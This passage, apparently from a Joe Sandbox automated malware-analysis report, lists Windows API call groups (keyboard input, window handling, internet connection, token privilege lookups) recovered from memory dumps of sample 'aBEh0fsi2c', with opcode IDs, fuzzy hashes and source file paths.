                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                          • String ID:
                                                          • API String ID: 3321077145-0
                                                          • Opcode ID: 87ce63e72a26213b37a502a0f8c4fb65c51326079498e032720430676d44f13a
                                                          • Instruction ID: 605ec88d26b1d58e6d398734a678d0d5cd68e5cf8cd74f5e1ed01faa63d6b293
                                                          • Opcode Fuzzy Hash: 87ce63e72a26213b37a502a0f8c4fb65c51326079498e032720430676d44f13a
                                                          • Instruction Fuzzy Hash: CE41E439600A50DFCB12EF55C485B59BBE9AF4A310F19C099ED4AAF366CB31ED01CB91
                                                          APIs
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003E88DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: InvalidateRect
                                                          • String ID:
                                                          • API String ID: 634782764-0
                                                          • Opcode ID: 0cb032ac193d95e787913ea2043585810ccaf0e084699ca3965e5fee99c2bc80
                                                          • Instruction ID: 4c762f31e3f71fa64dd272ad166239cd3a1fe16ff801daa35e73f02f70148e12
                                                          • Opcode Fuzzy Hash: 0cb032ac193d95e787913ea2043585810ccaf0e084699ca3965e5fee99c2bc80
                                                          • Instruction Fuzzy Hash: 21310530E001A8AFEF239B56DC45BB837A4EB05310F914711F919EA1E2CF7199409752
                                                          APIs
                                                          • ClientToScreen.USER32(?,?), ref: 003EAB60
                                                          • GetWindowRect.USER32(?,?), ref: 003EABD6
                                                          • PtInRect.USER32(?,?,003EC014), ref: 003EABE6
                                                          • MessageBeep.USER32(00000000), ref: 003EAC57
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                          • String ID:
                                                          • API String ID: 1352109105-0
                                                          • Opcode ID: 3cdf84c19debc7080002520037a000ab62f553785599845fa21e1be3430981f5
                                                          • Instruction ID: c1c2e4f7149f725506be329786eb6ff6e2b7218674bc5fdb9eba2694e143e278
                                                          • Opcode Fuzzy Hash: 3cdf84c19debc7080002520037a000ab62f553785599845fa21e1be3430981f5
                                                          • Instruction Fuzzy Hash: 244160306009A9DFCB22DF5AD884B697BF5FB49310F2582A9E415DF2A0D770B841CB92
                                                          APIs
                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003C0B27
                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 003C0B43
                                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003C0BA9
                                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003C0BFB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: a3551ca53a04dc927c556bedddb6c7dab961431832586f3c67eeb25c5b853a8d
                                                          • Instruction ID: 891f362f0a52270a289d1800fcfec849ce1630620c325cd2fb3e5cfe17366544
                                                          • Opcode Fuzzy Hash: a3551ca53a04dc927c556bedddb6c7dab961431832586f3c67eeb25c5b853a8d
                                                          • Instruction Fuzzy Hash: 93312630A40688EEFB3ACB258C05FFABBA9AB45328F04435EE595D61D1C3B5CD409761
                                                          APIs
                                                          • GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 003C0C66
                                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 003C0C82
                                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 003C0CE1
                                                          • SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 003C0D33
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: KeyboardState$InputMessagePostSend
                                                          • String ID:
                                                          • API String ID: 432972143-0
                                                          • Opcode ID: 581af58913d5856a0db9862c9b20c694e2db37709578169e227271b7059ad1f3
                                                          • Instruction ID: 5ba73dddf51b2fef59ed215289d82cd8bf0dfc30aec5eb8b96a2cb97837f28c6
                                                          • Opcode Fuzzy Hash: 581af58913d5856a0db9862c9b20c694e2db37709578169e227271b7059ad1f3
                                                          • Instruction Fuzzy Hash: B3314630940798EEFF3A8B648C08FFEBB6AAB45314F04832EE491EA5D1C3799D458751
                                                          APIs
                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003961FB
                                                          • __isleadbyte_l.LIBCMT ref: 00396229
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00396257
                                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0039628D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                          • String ID:
                                                          • API String ID: 3058430110-0
                                                          • Opcode ID: ce2e31214ff0f8ae3403930c8e52ed13806e26a0a026e7b952c94d904c514b7f
                                                          • Instruction ID: b0deb9e1048abb936c43deeb1fab6caeee7d7a9cd5e1f49dd7962c8796079bb3
                                                          • Opcode Fuzzy Hash: ce2e31214ff0f8ae3403930c8e52ed13806e26a0a026e7b952c94d904c514b7f
                                                          • Instruction Fuzzy Hash: 7831D230606246AFDF239F75CC46BAA7BB9FF41310F164529E8A48B191D730E950D790
                                                          APIs
                                                          • GetForegroundWindow.USER32 ref: 003E4F02
                                                            • Part of subcall function 003C3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003C365B
                                                            • Part of subcall function 003C3641: GetCurrentThreadId.KERNEL32 ref: 003C3662
                                                            • Part of subcall function 003C3641: AttachThreadInput.USER32(00000000,?,003C5005), ref: 003C3669
                                                          • GetCaretPos.USER32(?), ref: 003E4F13
                                                          • ClientToScreen.USER32(00000000,?), ref: 003E4F4E
                                                          • GetForegroundWindow.USER32 ref: 003E4F54
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                          • String ID:
                                                          • API String ID: 2759813231-0
                                                          • Opcode ID: c77e18608f8a0e3b2ab7f4c8daa791f3cdd032e6425cfb36833d064bc4376680
                                                          • Instruction ID: 415c53682aede030c64b5a58ff253fb393b06c0d6865644bd50aeffbba88da44
                                                          • Opcode Fuzzy Hash: c77e18608f8a0e3b2ab7f4c8daa791f3cdd032e6425cfb36833d064bc4376680
                                                          • Instruction Fuzzy Hash: 79313EB1D00108AFCB11EFA5C885EEFB7FDEF99304F10816AE415EB241DA719E058BA1
                                                          APIs
                                                            • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                          • GetCursorPos.USER32(?), ref: 003EC4D2
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0039B9AB,?,?,?,?,?), ref: 003EC4E7
                                                          • GetCursorPos.USER32(?), ref: 003EC534
                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0039B9AB,?,?,?), ref: 003EC56E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                          • String ID:
                                                          • API String ID: 2864067406-0
                                                          • Opcode ID: 2d2db81ebe1832f61f2de21a8af3b0174257f4e903aae730d2a57b6680988f0a
                                                          • Instruction ID: 27b1a84bf19492f4f8d5f4a8bcdd01b1e26aa2cb1ee72ce5847d183cacb5d3b1
                                                          • Opcode Fuzzy Hash: 2d2db81ebe1832f61f2de21a8af3b0174257f4e903aae730d2a57b6680988f0a
                                                          • Instruction Fuzzy Hash: 0B31E5356100A8AFCF228F5AC898EFE7BB9EB0A310F404265F9058B2E1C7316D51DF94
                                                          APIs
                                                            • Part of subcall function 003B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003B8121
                                                            • Part of subcall function 003B810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003B812B
                                                            • Part of subcall function 003B810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B813A
                                                            • Part of subcall function 003B810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8141
                                                            • Part of subcall function 003B810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003B8157
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003B86A3
                                                          • _memcmp.LIBCMT ref: 003B86C6
                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003B86FC
                                                          • HeapFree.KERNEL32(00000000), ref: 003B8703
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                          • String ID:
                                                          • API String ID: 1592001646-0
                                                          • Opcode ID: 5633f21f8b878a6ea5f25fb9b80706cab89cfaef4740ca94ac3d3ad2da027e28
                                                          • Instruction ID: 778f7bd52824da59d3c2d1b715e2d14220dabf62240565e4b0127dc7bc1a7322
                                                          • Opcode Fuzzy Hash: 5633f21f8b878a6ea5f25fb9b80706cab89cfaef4740ca94ac3d3ad2da027e28
                                                          • Instruction Fuzzy Hash: 14219D71E01208EFDB11DFA8C949BEEB7BCEF45308F158059E644AB280DB70AE05CB90
                                                          APIs
                                                          • __setmode.LIBCMT ref: 003809AE
                                                            • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
                                                            • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50
                                                          • _fprintf.LIBCMT ref: 003809E5
                                                          • OutputDebugStringW.KERNEL32(?), ref: 003B5DBB
                                                            • Part of subcall function 00384AAA: _flsall.LIBCMT ref: 00384AC3
                                                          • __setmode.LIBCMT ref: 00380A1A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                          • String ID:
                                                          • API String ID: 521402451-0
                                                          • Opcode ID: 95f176a1a321d98cdba8a291daee49e444044b9aef80549b1639346872360dbc
                                                          • Instruction ID: 4c4aa11221df62732956886dc9de5610a1cd186710fd376aeb509d1a75d442d2
                                                          • Opcode Fuzzy Hash: 95f176a1a321d98cdba8a291daee49e444044b9aef80549b1639346872360dbc
                                                          • Instruction Fuzzy Hash: 87112731504345AFDB0BB3B49C469FE77AC9F45320F2041AAF2059F582EF31594647A1
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D17A3
                                                            • Part of subcall function 003D182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003D184C
                                                            • Part of subcall function 003D182D: InternetCloseHandle.WININET(00000000), ref: 003D18E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: 34669b47abb6e6395a4834fbde25ec4d611bcaf8111465b398d40711c37a38b7
                                                          • Instruction ID: d7f394dfbe5db68975d2ccfb29ed7c11badb8bacc8a785ce506e62069ceb38be
                                                          • Opcode Fuzzy Hash: 34669b47abb6e6395a4834fbde25ec4d611bcaf8111465b398d40711c37a38b7
                                                          • Instruction Fuzzy Hash: 40215076200605BFEB239F60EC41BBABBADFB88710F10412BF9559A790D7719911A7A0
                                                          APIs
                                                          • GetFileAttributesW.KERNEL32(?,003EFAC0), ref: 003C3A64
                                                          • GetLastError.KERNEL32 ref: 003C3A73
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003C3A82
                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,003EFAC0), ref: 003C3ADF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                          • String ID:
                                                          • API String ID: 2267087916-0
                                                          • Opcode ID: 9fc40e69e62bd2551219e72b4c633200e01c63d7d3e43ff7a02fba8ff07a7380
                                                          • Instruction ID: 60d69606e79a169f1abfac810804f0a83c0e09875a0af3e556ee4dd94dae4ce1
                                                          • Opcode Fuzzy Hash: 9fc40e69e62bd2551219e72b4c633200e01c63d7d3e43ff7a02fba8ff07a7380
                                                          • Instruction Fuzzy Hash: 4421A3795082019FC311EF28C881DAA77E8EE59364F108A2DF4D9CB2E1D771DE55CB82
                                                          APIs
                                                          • _free.LIBCMT ref: 00395101
                                                            • Part of subcall function 0038571C: __FF_MSGBANNER.LIBCMT ref: 00385733
                                                            • Part of subcall function 0038571C: __NMSG_WRITE.LIBCMT ref: 0038573A
                                                            • Part of subcall function 0038571C: RtlAllocateHeap.NTDLL(00DF0000,00000000,00000001,00000000,?,?,?,00380DD3,?), ref: 0038575F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 82d3fba494ca5c189a563089757c8e23bb8592f6273c0b75861cf286e86e36e1
                                                          • Instruction ID: 58b545ada0af4e5d04efcfa53454f37c530f43f5bbe2b7c1e68cb7d51261dcb5
                                                          • Opcode Fuzzy Hash: 82d3fba494ca5c189a563089757c8e23bb8592f6273c0b75861cf286e86e36e1
                                                          • Instruction Fuzzy Hash: 3311A072A00B15AFCF333F74AC4575E3B989B543A1F21496AF9449E290DF74C9C18790
                                                          APIs
                                                            • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003C7896,?,?,00000000), ref: 00365A2C
                                                            • Part of subcall function 00365A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003C7896,?,?,00000000,?,?), ref: 00365A50
                                                          • gethostbyname.WSOCK32(?), ref: 003D6399
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003D63A4
                                                          • _memmove.LIBCMT ref: 003D63D1
                                                          • inet_ntoa.WSOCK32(?), ref: 003D63DC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                          • String ID:
                                                          • API String ID: 1504782959-0
                                                          • Opcode ID: d7bae89d0e52483d7b585d7da9cb865be788cf0e5fd49cbb6b9f86b80d30822a
                                                          • Instruction ID: 1f094e983a96c8ef84b1e4ae9e5032c27f16d4359a5b9ba6721e387bbeb1f0fe
                                                          • Opcode Fuzzy Hash: d7bae89d0e52483d7b585d7da9cb865be788cf0e5fd49cbb6b9f86b80d30822a
                                                          • Instruction Fuzzy Hash: 88116372500109AFCB16FBA4DD86DEE77BCAF08310B148176F505EB2A1DB30AE14CB61
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 003B8B61
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8B73
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8B89
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 003B8BA4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 69c3e380c528f19fdfd701c53ee466847ab6e0dfaa7967b3fd957d501c15e749
                                                          • Instruction ID: c60d3d8697f958c287a2759482cb4991112a3e90c575011972b70797977314f3
                                                          • Opcode Fuzzy Hash: 69c3e380c528f19fdfd701c53ee466847ab6e0dfaa7967b3fd957d501c15e749
                                                          • Instruction Fuzzy Hash: 37110A79901218FFDB11DBA5C885EDDBB78EB48710F204195EA00B7290DA716E11DB94
                                                          APIs
                                                            • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 003612D8
                                                          • GetClientRect.USER32(?,?), ref: 0039B5FB
                                                          • GetCursorPos.USER32(?), ref: 0039B605
                                                          • ScreenToClient.USER32(?,?), ref: 0039B610
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: 9bb906280c07b666f6ea768927964fbdcca49e53c2b5554c0130e95997b20a9b
                                                          • Instruction ID: cd058ac25bc09e7554dac1677ee68160d9a411963ddd3b00943bda8b0d21a763
                                                          • Opcode Fuzzy Hash: 9bb906280c07b666f6ea768927964fbdcca49e53c2b5554c0130e95997b20a9b
                                                          • Instruction Fuzzy Hash: 36114F35600459EFCF12EF98D8959FE77B8FB06300F408955F941EB180C770BA518BA5
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003BD84D
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003BD864
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003BD879
                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 003BD897
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
